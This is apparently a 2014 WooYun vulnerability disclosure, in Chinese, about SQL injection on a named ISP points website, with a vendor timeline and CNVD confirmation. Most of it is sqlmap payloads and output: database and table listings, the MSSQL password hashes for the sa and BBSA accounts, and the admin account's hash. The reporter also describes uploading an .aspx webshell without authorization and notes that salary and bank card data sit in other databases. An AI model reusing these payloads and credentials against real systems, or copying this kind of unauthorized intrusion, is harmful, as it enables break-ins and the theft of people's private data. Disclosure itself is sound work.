漏洞详情

披露状态:

2014-04-13: 细节已通知厂商并且等待厂商处理中
2014-04-18: 厂商已经确认,细节仅向厂商公开
2014-04-28: 细节向核心白帽子及相关领域专家公开
2014-05-08: 细节向普通白帽子公开
2014-05-18: 细节向实习白帽子公开
2014-05-28: 细节向公众公开

简要描述:

注入漏洞已get shell

详细说明:

http://point.gzgwbn.net.cn/newsinfo.aspx?nid=72 注入点在这里



Place: GET
Parameter: nid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nid=72 AND 8365=8365

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: nid=-6303 OR 2019=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)



available databases [9]:

[*] Appreciation

[*] GZGWBN_Points

[*] GZGWBN_WPF

[*] GZGWBN_WPF1

[*] GZGWBN_WPF2

[*] master

[*] model

[*] msdb

[*] tempdb

9个库子

Database: GZGWBN_Points
[81 tables]
+--------------------------------+
| A111 |
| A_2012_0507 |
| AoYun2012_Answer |
| AoYun2012_Answer_Bak |
| AoYun2012_Result |
| ApplyOTT |
| ApplySignUp |
| Bak_sys_custb |
| D99_Tmp |
| GZ_Lottery |
| GZ_Lottery_PlayNums |
| GZ_Point_BatchDeal |
| GZ_Point_V_Quantity_GoodsBook |
| GZ_Summer_Lottery |
| PackageSatisticsList |
| ProductPayNum |
| Questionnaire |
| VPoint_Donation_Before_2006 |
| V_Commentary |
| V_CustomerPoint |
| V_DealInfo |
| V_Deal_RowColumn |
| V_GZ_Lottery |
| V_Goods_NowQuan |
| V_Lottery_CountByDays |
| V_Lottery_CountByGoods |
| V_Lottery_CountBySH |
| V_QuantityStatistics |
| V_Quantity_Active_Book_GrowDay |
| V_Quantity_Active_SH |
| V_Quantity_GoodsBook |
| V_Summer_Lottery |
| V_Summer_Lottery_CountByDays |
| custbb |
| hd_ganentb |
| scoretbb |
| shop_basetb |
| shop_goodoneclasstb |
| shop_goodstb |
| shop_goodtwoclasstb |
| shop_helptb |
| shop_huantb |
| shop_nclasstb |
| shop_newstb |
| shop_notetb |
| shop_saytb |
| shop_scoretb |
| shop_selecttb |
| shop_usertb |
| sys_admintb |
| sys_biantb |
| sys_blackcustb |
| sys_caotb |
| sys_cuntb |
| sys_custb |
| sys_dealtb |
| sys_emailtb |
| sys_hourtb |
| sys_ozhantb |
| sys_protb |
| sys_qutb |
| sys_scoretb |
| sys_useremailtb |
| sys_xingtb |
| sys_xitb |
| sys_yingtb |
| sys_zhantb |
| sys_zhantbbak |
| sys_zhetb |
| sysdiagrams |
| tEmailCount |
| tb_Luckydraw |
| tb_phoneActivate |
| tb_sports_310 |
| tb_sports_country |
| tb_sports_help |
| tb_sports_main |
| tb_sports_mybet |
| tb_sports_ssname |
| tb_sports_user |
| vProductPayNum

挑了个库子跑表

别的库子里还有员工工资和银行卡号等信息,库实在太大了,跑的抗不住啊亲

还是SA权限

database management system users password hashes:
[*] BBSA [1]:
password hash: 0x010011a6742cfce6ff23c521222535662f07ebfcc6d2322c6462
header: 0x0100
salt: 11a6742c
mixedcase: fce6ff23c521222535662f07ebfcc6d2322c6462

[*] sa [1]:
password hash: 0x01004086ceb665942725e30e13ba2f7425abeb2c1cd1612c7b3b
header: 0x0100
salt: 4086ceb6
mixedcase: 65942725e30e13ba2f7425abeb2c1cd1612c7b3b



后台很好找:http://point.gzgwbn.net.cn/admin/login.aspx

跑表得出

+-----+----------------------------------+-------+
| uid | upwd | uname |
+-----+----------------------------------+-------+
| 1 | C922206634F4C33F728138ED57B6246B | admin |
| 4 | <blank> | NULL |
+-----+----------------------------------+-------+





登录后台后发现FCKeditor上传,顿时死的心都有了,我白费劲了,但是发现此FCK上传不能利用,至少我这个彩笔是没那本事。。。

http://point.gzgwbn.net.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http%3A%2F%2Fpoint.gzgwbn.net.cn%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx



愁苦中意外发现后台传幻灯片的地方可以直接上传.aspx 顿时艳阳高照啊!!

99.jpg

到这里就算了,主要我用的这个长城宽带过了12点总掉线,给打电话投诉还没人接,大小也是一ISP啊!!所以。。但是纯属友情检测,绝对没有删改东西。

漏洞证明:

就传2个菜刀截图吧*-*

11.jpg



22.jpg

修复方案:

过滤参数,修复FCKeditor上传,最最重要是保证网络稳定啊亲,我不想半夜掉线了。

版权声明:转载请注明来源 23号@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2014-04-18 09:18

厂商回复:

CNVD确认并复现所述情况(仅验证第一道风险,SQL注入),已经由CNVD通过以往联系渠道,将通报发送至 和中处置。

最新状态:

暂无


漏洞评价: